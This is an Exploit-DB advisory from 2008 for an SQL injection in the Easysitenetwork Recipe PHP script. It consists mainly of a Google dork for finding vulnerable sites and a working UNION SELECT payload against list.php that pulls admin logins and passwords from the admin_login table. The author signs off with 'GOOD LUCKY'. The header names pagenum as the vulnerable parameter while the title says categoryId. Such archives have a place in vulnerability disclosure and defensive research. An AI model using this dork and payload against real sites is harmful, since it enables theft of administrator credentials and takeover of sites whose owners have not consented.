Easysitenetwork Recipe - 'categoryId' SQL Injection

EDB-ID:

4960


Author:

S@BUN

Type:

webapps


Platform:

PHP

Date:

2008-01-22


#########################################################################
#
# Recipes hacking(list.php?pagenum)SQL Injection
#
#
#########################################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.hackturkiye.com/
#
#########################################################################
#
# DORKS 2 : allinurl: " list.php?pagenum"
#
#########################################################################
# EXPLOIT
#
# list.php?pagenum=0&categoryid=1+union+select+111,222,concat_ws(char(58),login,password),444+from+admin_login/*
#

#########################################################################
# S@BUN                 www.hackturkiye.com                    S@BUN
#########################################################################
# S@BUN                      GOOD LUCKY                          S@BUN
#########################################################################

# milw0rm.com [2008-01-22]